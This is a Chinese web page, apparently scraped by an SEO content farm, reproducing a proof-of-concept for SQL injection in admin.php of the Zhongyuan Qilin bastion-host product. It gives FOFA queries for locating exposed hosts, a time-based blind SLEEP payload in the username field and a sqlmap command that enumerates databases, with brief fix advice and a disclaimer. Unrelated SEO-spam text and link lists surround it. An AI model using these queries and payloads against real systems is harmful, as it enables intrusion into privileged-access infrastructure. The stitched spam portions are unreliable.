当前位置: 首页 > news >正文

seo营销培训咨询黑帽seo是作弊手法

seo营销培训咨询,黑帽seo是作弊手法,郑州网站建设灵秀,一旦开战最危险的城市简介 中远麒麟堡垒机用于运维管理的认证、授权、审计等监控管理,在该产品admin.php处存在SQL 注入漏洞。 漏洞复现 FOFA语法: body"url\"admin.php?controlleradmin_index&actionget_user_login_fristauth&username" 或者 c…

简介

中远麒麟堡垒机用于运维管理的认证、授权、审计等监控管理,在该产品admin.php处存在SQL 注入漏洞。

漏洞复现

FOFA语法:

body="url=\"admin.php?controller=admin_index&action=get_user_login_fristauth&username="

或者

cert.subject="Baolei"

访问界面如下所示:

POC:  /admin.php?controller=admin_commonuser

GET请求如下:

payload:   

username=admin' AND (SELECT 12 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm

POST请求后页面返回时间延长5秒证明漏洞存在

SQLMAP命令:

sqlmap.py -u "https://ip:port/admin.php?controller=admin_commonuser" --data "username=admin" --level=3 --dbs --is-dba

修复建议

安装更新厂商发布的新版本

添加访问控制

过滤威胁参数

免责声明

该文章仅供学习用途使用,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。


结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

http://www.yidumall.com/news/107437.html

相关文章:

  • 昆明网站设计能实现什么功能公司软文怎么写
  • 沈阳网站制作 600元直通车关键词优化
  • 北京架设网站网络营销ppt怎么做
  • 做logo找灵感的网站网络免费推广平台
  • 河北建设网站怎么下载企业锁网络销售的方法和技巧
  • 微信开发者工具安装武汉seo服务
  • 团购网站建设方案百度信息流投放在哪些平台
  • 罗永浩做的网站谷歌浏览器下载安卓版
  • 做黄页网站要告我营销软文范例大全100
  • 西安网站推广都是怎么做的seo数据分析哪些方面
  • 大连建设工程设计院有限公司网站竞价推广代运营公司
  • 常德网站建设公司百度网盘登录
  • 怎样学网站开发百度财报q3
  • 套餐型网站建设合同广州专做优化的科技公司
  • 在家跟狗做网站视频武汉百度推广外包
  • dw6做网站百度推广登录首页官网
  • 池州市建设管理处网站中公教育培训机构官网
  • 万网空间最多放几个网站百度学术搜索入口
  • 做网站的公司名称360排名优化工具
  • 口碑好的网站定制公司收录之家
  • 廊坊网站建设技术外包颜色广告
  • 做日语字幕的网站人脉推广app
  • 有哪些做留学资讯的网站百度问一问
  • 江苏网站建设价格搜索引擎技术
  • 站内营销推广的案例在线外链发布工具
  • 自己做的网站能上传吗酒泉网站seo
  • 自己制作手机软件app网站优化有哪些技巧
  • 做海报的专业网站兰州网站seo诊断
  • 网站域名所有权惠州seo
  • 营销型网站制作平台武汉seo价格